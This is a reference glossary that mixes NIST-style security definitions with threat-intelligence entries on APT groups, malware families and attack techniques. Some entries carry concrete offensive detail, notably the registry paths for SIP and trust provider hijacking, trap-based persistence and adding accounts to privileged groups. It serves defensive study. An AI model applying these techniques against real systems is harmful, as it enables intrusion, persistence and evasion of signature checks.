Description: SUGARDUMP is a proprietary browser credential harvesting tool that was used by UNC3890 during the C0010 campaign. The first known SUGARDUMP version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.

Name: APT-C-23
Type: intrusion-set
Description: APT-C-23 is a threat group that has been active since at least 2014. APT-C-23 has primarily focused its operations on the Middle East, including Israeli military assets. APT-C-23 has developed mobile spyware targeting Android and iOS devices since 2017.

Term: security authorization package
Definition: The essential information that an authorizing official uses to determine whether to authorize the operation of an information system or the provision of a designated set of common controls. At a minimum, the authorization package includes an executive summary, system security plan, privacy plan, security control assessment, privacy control assessment, and any relevant plans of action and milestones. Formerly known as "accreditation package".

Term: architecture
Definition: complying with the principles that drive the system design; i.e., guidelines on the placement and implementation of specific security services within various distributed computing environments.

Term: physical access control system
Definition: An electronic system that controls the ability of people or vehicles to enter a protected area by means of authentication and authorization at access control points.

Term: cyber resiliency control
Definition: A control (i.e., a base control or a control enhancement), as defined in [NIST SP 800-53], that applies one or more cyber resiliency techniques or approaches or that is intended to achieve one or more cyber resiliency objectives.

Term: subject
Definition: A person, organization, device, hardware, network, software, or service.

Term: dataset without identifiers
Definition: A dataset that does not contain direct identifiers.

Term: cyber resiliency
Definition: The ability to anticipate, withstand, recover from, and adapt to adverse conditions, stresses, attacks, or compromises on systems that use or are enabled by cyber resources.

Name: Social Engineering
Type: attack-pattern
Description: Adversaries may use social engineering techniques to influence users to take actions that result in unauthorized access, approval of changes, disclosure of sensitive information, or execution of adversary-supplied instructions (i.e., introduction of malicious payloads or software), while minimizing technical indicators. 

Adversaries may leverage trust-building methods across multiple channels (e.g., executive, vendor, or help desk scenarios, including AI-enabled voice interactions) to prompt user-authorized actions such as password resets, MFA changes, financial approvals, or the disclosure of sensitive information. Adversaries may also leverage common business communications and workflows such as email, collaboration platforms, voice communications, recruiting processes, help desk interactions, and SaaS consent mechanisms to make malicious requests appear routine and legitimate.

Additionally, adversaries have persuaded victims to take actions through references of current events, harnessing relevant themes to the work role or the organizations mission. For example, adversaries may use scare tactics (i.e., threaten repercussions for non-compliance) or otherwise incite victims’ emotions in order to generate a sense of urgency to take action.

This technique may include common social engineering patterns such as Phishing and Spearphishing Voice, often supported by convincing and targeted narratives.

Term: public key certificate
Definition: A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its validity period.

Name: Outlook Forms
Type: attack-pattern
Description: Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.

Term: artificial intelligence
Definition: (1) Any artificial system that performs tasks under varying and unpredictable circumstances without significant human oversight, or that can learn from experience and improve performance when exposed to data sets. (2) An artificial system developed in computer software, physical hardware, or other context that solves tasks requiring human-like perception, cognition, planning, learning, communication, or physical action. (3) An artificial system designed to think or act like a human, including cognitive architectures and neural networks. (4) A set of techniques, including machine learning, that is designed to approximate a cognitive task. (5) An artificial system designed to act rationally, including an intelligent software agent or embodied robot that achieves goals using perception, planning, reasoning, learning, communicating, decision making, and acting.

Term: risk model
Definition: A key component of a risk assessment methodology (in addition to assessment approach and analysis approach) that defines key terms and assessable risk factors.

Term: Event Filtering
Definition: The suppression of log entries from analysis, reporting, or long-term storage because their characteristics indicate that they are unlikely to contain information of interest.

Term: Asymptotic Analysis
Definition: A statistical technique that derives limiting approximations for functions of interest.

Term: reciprocity
Definition: Mutual agreement among participating enterprises to accept each other’s security assessments in order to reuse information system resources and/or to accept each other’s assessed security posture in order to share information.

Name: Unsecured Credentials
Type: attack-pattern
Description: Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Shell History), operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. Private Keys).

Term: party
Definition: An individual person, organization, device, or process. In this specifica­tion, there are two parties (e.g., Party A and Party B, or Alice and Bob) who jointly perform the key establishment process using a KEM.

Term: <em>R</em>
Definition: In XMSS, the n-byte randomizer used for randomized message hashing.

Term: claimant
Definition: The Bluetooth device attempting to prove its identity to the verifier during the Bluetooth connection process.

Term: general purpose enterprise cross domain service (GP-ECDS)
Definition: An enterprise cross domain service available to authorized users of connected networks that supports a broad range of data types.

Term: SCAP data stream
Definition: A specific instantiation of SCAP content.

Term: C2
Definition: Command and Control' is the exercise of authority and direction by a properly designated commander over assigned and attached forces in the accomplishment of the mission. Command and control functions are performed through an arrangement of personnel, equipment, communications, facilities, and procedures employed by a commander in planning, directing, coordinating, and controlling forces and operations in the accomplishment of the mission.

Term: Agent
Definition: A host-based IPS program that monitors and analyzes activity and performs preventive actions; OR a program or plug-in that enables an SSL VPN to access non-Web-based applications and services.

Name: TEARDROP
Type: malware
Description: TEARDROP is a memory-only dropper that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was likely used by APT29 since at least May 2020.

Name: Kivars
Type: malware
Description: Kivars is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by BlackTech in a 2010 campaign.

Name: Steal Web Session Cookie
Type: attack-pattern
Description: An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.

There are several examples of malware targeting cookies from web browsers on the local system. Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on User Execution by tricking victims into running malicious JavaScript in their browser.

There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.

After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.

Term: <em>r</em>
Definition: An integer, smaller or equal to 32, whose value is the length of the binary representation of the counter i when i is an input in counter mode  or  (optionally)  in  feedback  mode  and  double-pipeline iteration mode of each iteration of the PRF.

Term: Sub-functions
Definition: Sub-functions are the basic operations employed to provide the system services within each area of operations or line of business. The recommended information types provided in NIST SP 800-60 are established from the “business areas” and “lines of business” from OMB’s Business Reference Model (BRM) section of Federal Enterprise Architecture (FEA) Consolidated Reference Model Document Version 2.3

Term: ABAC
Definition: The set of rules that define the conditions under which an access may take place.

Name: NPPSPY
Type: tool
Description: NPPSPY is an implementation of a theoretical mechanism first presented in 2004 for capturing credentials submitted to a Windows system via a rogue Network Provider API item. NPPSPY captures credentials following submission and writes them to a file on the victim system for follow-on exfiltration.

Term: cover (TRANSEC)
Definition: Result of measures used to obfuscate message externals to resist traffic analysis.

Term: <em>Ms</em>
Definition: The (original) message prior to randomization.

Term: Asset Report Request
Definition: A collection of structured information used as input to generate an asset report. An asset report request may be of any format and may have different contexts depending on the nature of the request. For instance, the request may be written in a control language that dictates how the request is to be propagated and executed. The request may also be written as a formal definition without reference to how the request is to be executed. The request may also be a prose description that must be interpreted and executed by a person. These examples are not exhaustive.

Name: ZxShell
Type: malware
Description: ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.

Term: Update
Definition: New, improved, or fixed software, which replaces older versions of the same software. For example, updating an OS brings it up-to-date with the latest drivers, system utilities, and security software. Updates are often provided by the software publisher free of charge.

Term: DB
Definition: A repository of information that usually holds plant-wide information including process data, recipes, personnel data, and financial data.

Term: black box testing
Definition: A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object.

Term: Linear Complexity Test
Definition: The purpose of this test is to determine whether or not the sequence is complex enough to be considered random.

Name: Ping
Type: tool
Description: Ping is an operating system utility commonly used to troubleshoot and verify network connections.

Term: system security plan
Definition: See security plan.

Term: authenticity
Definition: The property of being genuine and being able to be verified and trusted; confidence in the validity of a transmission, a message, or message originator

Term: Owner
Definition: For a symmetric key (i.e., a secret key), the entity or entities that are authorized to share and use the key.

Term: key pair
Definition: A public key and its corresponding private key. A key pair is used with a public key algorithm.

Term: XML
Definition: a flexible text format designed to describe data for electronic publishing.

Term: key
Definition: A cryptographic key that can be directly used by a cryptographic algorithm to perform a cryptographic operation.

Term: P_HASH
Definition: A function that uses the HMAC-HASH as the core function in its construction. The specification of this function is in RFCs 2246 and 5246.

Term: Array
Definition: A fixed-length data structure that stores a collection of elements, where each element is identified by its integer index.

Term: regrader
Definition: A trusted process explicitly authorized to re-classify and re-label data in accordance with a defined policy exception. Untrusted or unauthorized processes are such actions by the security policy.

Term: Focal Document
Definition: A source document that is used as the basis for comparing an element with an element from another document. As of this writing, the OLIR Program has three Focal Documents: the Cybersecurity Framework version 1.1, the Privacy Framework version 1.0, and SP 800-53 Rev. 4.

Term: authenticate
Definition: Note that in common practice, the term "authentication" is used to mean either source or identity authentication only. This document will differentiate the multiple uses of the word by the terms source authentication, identity authentication, or integrity authentication, where appropriate.

Name: Acquire Access
Type: attack-pattern
Description: Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems. In some cases, adversary groups may form partnerships to share compromised systems with each other.

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., Web Shell) or established access via External Remote Services. In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a Trusted Relationship, Multi-Factor Authentication Interception, or even Supply Chain Compromise.

**Note:** while this technique is distinct from other behaviors such as Purchase Technical Data and Credentials, they may often be used in conjunction (especially where the acquired foothold requires Valid Accounts).

Term: Signed data
Definition: The data or message upon which a digital signature has been computed. Also, see Message.

Term: Cryptographic keying relationship
Definition: The state existing between two entities such that they share at least one cryptographic key.

Term: subscriber-controlled wallet
Definition: A type of IdP that is issued attribute bundles by the CSP. The subscriber-controlled wallet that is either housed on a subscriber-controlled device (sometimes known as a digital wallet) or as a remote service (sometimes known as a cloud wallet).

Term: Computer Security Incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Name: Additional Local or Domain Groups
Type: attack-pattern
Description: An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.

On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups. On Linux, adversaries may use the `usermod` command for the same purpose.

For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage Remote Desktop Protocol to log into the endpoints in the future. Adversaries may also add accounts to VPN user groups to gain future persistence on the network. On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage Sudo and Sudo Caching for elevated privileges. 

In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.

Name: Conti
Type: malware
Description: Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.

Term: Installation (of keying material)
Definition: The process of making keying material available for establishing and maintaining cryptographic relationships.

Name: Xbash
Type: malware
Description: Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.

Term: Content Generator
Definition: A program on a Web server that will dynamically generate HyperText Markup Language (HTML) pages for users. Content generators can range from simple Common Gateway Interface (CGI) scripts executed by the Web server to Java EE or .NET application servers in which most—if not all—HTML pages served are dynamically generated.

Term: AODR
Definition: An organizational official acting on behalf of an authorizing official in carrying out and coordinating the required activities associated with security authorization or privacy authorization.

Term: CFO
Definition: A senior member responsible for managing the financial actions of an agency or organization.

Term: Initialization Vector (IV)
Definition: A binary string that is used as an initial value in computing the first iteration in feedback mode. It may be an empty string.

Term: Mode of Operation (Mode)
Definition: The value of the random sample that occurs with the greatest frequency. This value is not necessarily unique.

Term: Threat Shifting
Definition: Response from adversaries to perceived safeguards and/or countermeasures (i.e., security controls), in which the adversaries change some characteristic of their intent to do harm in order to avoid and/or overcome those safeguards/countermeasures.

Term: <em>On-demand test</em>
Definition: A type of health test that is available to be run whenever a user or a relying component requests it.

Term: cryptographic key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification.

Term: application-specific integrated circuits (ASICs)
Definition: A digital or analog circuit, custom-designed and/or custom-manufactured to perform a specific function. An ASIC is not reconfigurable and cannot contain additional instructions.

Term: IA
Definition: Measures that protect and defend information and information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. These measures include providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. 
Note: DoDI 8500.01 has transitioned from the term information assurance (IA) to the term cybersecurity. This could potentially impact IA related terms.

Term: After Action Report
Definition: A document containing findings and recommendations from an exercise or a test.

Term: DNS
Definition: The system by which Internet domain names and addresses are tracked and regulated as defined by IETF RFC 1034 and other related RFCs.

Term: hash function
Definition: A function on bit strings in which the length of the output is fixed. The output often serves as a condensed representation of the input.

Term: portable storage device
Definition: A system component that can be inserted into and removed from a system and that is used to store information or data (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid-state devices (e.g., compact/digital video disks, flash/thumb drives, external solid-state drives, external hard disk drives, flash memory cards/drives that contain nonvolatile memory).

Term: cyber range
Definition: This technique provides a safe environment (i.e., “sandbox”) to deliver hands-on realistic training, scenarios, challenges, and exercises in an easy-to-access web-based environment.

Name: Molerats
Type: intrusion-set
Description: Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.

Term: Specific
Definition: String of bytes.

Term: security architecture
Definition: An embedded, integral part of the enterprise architecture that describes the structure and behavior for an enterprise’s security processes, information security systems, personnel and organizational sub-units, showing their alignment with the enterprise’s mission and strategic plans. See information security architecture.

Term: Traceable
Definition: Information that is sufficient to make a determination about a specific aspect of an individual's activities or status.

Term: Environmental testing
Definition: Evaluating the behavior of a device or system to obtain assurance that it will not be compromised by environmental conditions or fluctuations when operating outside the normal environmental operating range.

Term: Logical partitioning
Definition: The hypervisor allowing multiple guest OSs to share the same physical resources.

Name: Additional Email Delegate Permissions
Type: attack-pattern
Description: Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 

For example, the <code>Add-MailboxPermission</code> PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox. In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings. 

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add Additional Cloud Roles to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: Internal Spearphishing), so the messages evade spam/phishing detection mechanisms.

Term: identity API
Definition: A protected API that is accessed by an RP to retrieve the attributes of a specific subscriber.

Term: <strong>Should</strong>
Definition: This term is used to indicate an important recommendation. Ignoring the recommendation could result in undesirable results.

Term: event
Definition: Any observable occurrence in a system.

Term: risk response plan
Definition: A summary of potential consequence(s) of the successful exploitation of a specific vulnerability or vulnerabilities by a threat agent, as well as mitigating strategies and C-SCRM controls.

Term: I/O
Definition: A general term for the equipment that is used to communicate with a computer as well as the data involved in the communications.

Name: Lurid
Type: malware
Description: Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006.

Name: MagicRAT
Type: malware
Description: MagicRAT is a remote access tool developed in C++ and exclusively used by the Lazarus Group threat actor in operations. MagicRAT allows for arbitrary command execution on victim machines and provides basic remote access functionality.

Name: Tonto Team
Type: intrusion-set
Description: Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).

Term: parameter
Definition: A value that is used to control the operation of a function or that is used by a function to compute one or more outputs.

Term: Network Administrator
Definition: A person who manages a local area network (LAN) within an organization. Responsibilities include ensuring network security, installing new applications, distributing software upgrades, monitoring daily activity, enforcing licensing agreements, developing a storage management program, and providing for routine backups.

Name: PS1
Type: malware
Description: PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.

Term: encryption
Definition: Cryptographic transformation of data (called “plaintext”) into a form (called “ciphertext”) that conceals the data’s original meaning to prevent it from being known or used. If the transformation is reversible, the corresponding reversal process is called “decryption,” which is a transformation that restores encrypted data to its original state.

Term: obscured data
Definition: data that has been distorted by cryptographic or other means to hide information. It is also referred to as being masked or obfuscated.

Term: authenticate
Definition: The process by which a claimant proves possession and control of one or more authenticators bound to a subscriber account to demonstrate that they are the subscriber associated with that account.

Term: Fit for purpose
Definition: Fit for purpose is used informally to describe a process, configuration item, IT service, etc., that is capable of meeting its objectives or service levels. Being fit for purpose requires suitable design, implementation, control, and maintenance.

Term: key agreement
Definition: A key-establishment procedure where the resultant keying material is a function of information contributed by two or more participants, so that an entity cannot predetermine the resulting value of the keying material independently of any other entity’s contribution.

Term: Hash- Based Message Authentication Code
Definition: Keyed-Hash Message Authentication Code specified in [FIPS198].

Term: IMAP
Definition: A method of communication used to read electronic messages stored in a remote server.

Term: system component
Definition: Discrete identifiable information technology assets that represent a building block of a system and include hardware, software, firmware, and virtual machines.

Term: Rivest-Shamir-Adleman
Definition: A public-key algorithm that is used for key establishment and the generation and verification of digital signatures.

Term: exfiltration
Definition: The unauthorized transfer of information from a system.

Term: federal agency
Definition: An executive department specified in 5 U.S.C., Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); or a wholly owned Government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Name: Trap
Type: attack-pattern
Description: Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.

Term: Hypothesis (Null)
Definition: A statement H0 about the assumed default condition/property of the observed sequence. For the purposes of this document, the null hypothesis H0 is that the sequence is random. If H0 is in fact true, then the reference distribution and critical values of the test statistic may be derived.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact agency operations (including mission, functions, image, or reputation), agency assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: RPC
Definition: A person or Agency who has received information that includes a certificate and a digital signature verifiable with reference to a public key listed in the certificate, and is in a position to rely on them.

Term: Digital Fingerprint
Definition: A hash that uniquely identifies data. Changing a single bit in the data stream used to generate the message digest will yield a completely different message digest.

Term: Galois/Counter Mode
Definition: Galois/Counter Mode

Term: State
Definition: Intermediate result of the AES block cipher that is represented as a two-dimensional array of bytes with four rows and&nbsp;<span class="math-tex">\(Nb\)</span>&nbsp;columns.

Term: xy
Definition: The product of x and y.

Name: Empire
Type: tool
Description: Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.

Term: access list
Definition: A list of users, programs, and/or processes and the specifications of access categories to which each is assigned.

Term: DPC
Definition: A credential issued based on proof of possession and control of the PIV Card, so as not to duplicate the identity proofing process as defined in [NIST SP 800-63-2]. A Derived PIV Credential token is a hardware or software based token that contains the Derived PIV Credential.

Term: High-Value Asset
Definition: A designation of Federal information or a Federal information system when it relates to one or more of the following categories: 
-  Informational Value – The information or information system that processes, stores, or transmits the information is of high value to the Government or its adversaries.
-  Mission Essential – The agency that owns the information or information system cannot accomplish its Primary Mission Essential Functions (PMEF), as approved in accordance with Presidential Policy Directive 40 (PPD-40) National Continuity Policy, within expected timelines without the information or information system.
-  Federal Civilian Enterprise Essential (FCEE) – The information or information system serves a critical function in maintaining the security and resilience of the Federal civilian enterprise.

Name: Credentials
Type: attack-pattern
Description: Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via Phishing for Information. Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors. Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).

Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: Search Engines, breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: External Remote Services or Valid Accounts).

Term: <em>SEED</em>
Definition: An optional ECC domain parameter; an initialization value that is used during domain parameter generation that can also be used to provide assurance at a later time that the resulting domain parameters were generated using a canonical process.

Term: RA
Definition: An organization approved by ISO/IEC for performing registration.

Term: Rijndael
Definition: The block cipher that NIST selected as the winner of the AES competition.

Term: Address
Definition: The associated data string.

Term: Primary facility
Definition: An FCKMS facility that houses a primary system.

Term: Defect Check
Definition: A defect check is a way to assess determination statements. It has the following additional properties. A defect check: 
• Is stated as a test (wherever appropriate); 
• Can be automated; 
• Explicitly defines a particular desired state specification that is then compared to the corresponding actual state to determine the test result; 
• Provides information that may help determine the degree of control effectiveness/level of risk that is acceptable; 
• Suggests risk response options; and 
• Assesses a corresponding sub-capability.

Term: authenticity
Definition: The property of being genuine and being able to be verified and trusted; confidence in the validity of a transmission, message, or message originator. See authentication.

Term: <em>A</em>
Definition: Additional input that is bound to keying material; a byte string.

Term: IT System
Definition: A specific IT installation, with a particular purpose and operational environment.

Term: assurance
Definition: Grounds for justified confidence that a claim has been or will be achieved. 
Note 1: Assurance is typically obtained relative to a set of specific claims. The scope and focus of such claims may vary (e.g., security claims, safety claims) and the claims themselves may be interrelated. 
Note 2: Assurance is obtained through techniques and methods that generate credible evidence to substantiate claims.

Name: Shortcut Modification
Type: attack-pattern
Description: Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence. Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), adversaries may also create a new shortcut as a means of indirection, while also abusing Masquerading to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. Browser Extensions) to persistently launch malware.

Name: SIP and Trust Provider Hijacking
Type: attack-pattern
Description: Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. 

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs). 

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: 

* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via DLL search order hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.

Term: approved
Definition: FIPS-approved and/or NIST-recommended.

Name: Runtime Data Manipulation
Type: attack-pattern
Description: Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data. By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Term: decryption key
Definition: A cryptographic key that is used with a PKE in order to decrypt ciphertexts into plaintexts. The decryption key must be kept private and must be destroyed after it is no longer needed.

Name: ipconfig
Type: tool
Description: ipconfig is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration.

Term: Rivest-Shamir-Adleman
Definition: For the purposes of this specification, RSA is a public-key signature algorithm specified by PKCS #1. As a reversible public-key algorithm, it may also be used for encryption.

Name: FlawedAmmyy
Type: malware
Description: FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.

Term: Passphrase
Definition: A password that consists of a sequence of words or other text that a claimant uses to authenticate their identity. A passphrase is similar to a password in usage but is generally longer for added security.

Term: risk analysis
Definition: Risk management includes threat and vulnerability analyses as well as analyses of adverse effects on individuals arising from information processing and considers mitigations provided by security and privacy controls planned or in place. Synonymous with risk analysis.

Term: compensating controls
Definition: The security and privacy controls implemented in lieu of the controls in the baselines described in NIST Special Publication 800-53 that provide equivalent or comparable protection for a system or organization.

Name: Nltest
Type: tool
Description: Nltest is a Windows command-line utility used to list domain controllers and enumerate domain trusts.

Term: Long Runs of Ones Test
Definition: The purpose of this test is to determine whether the longest run of ones within the tested sequence is consistent with the longest run of ones that would be expected in a random sequence.

Name: Port Knocking
Type: attack-pattern
Description: Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r , is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

Term: Family and Educational Records Privacy Act
Definition: the primary law in the United States that governs the privacy of student educational records

Term: hybrid security control
Definition: A security control that is implemented in an information system in part as a common control and in part as a system-specific control.

Term: DRBG
Definition: An RBG that includes a DRBG mechanism and (at least initially) has access to a source of entropy input. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator.

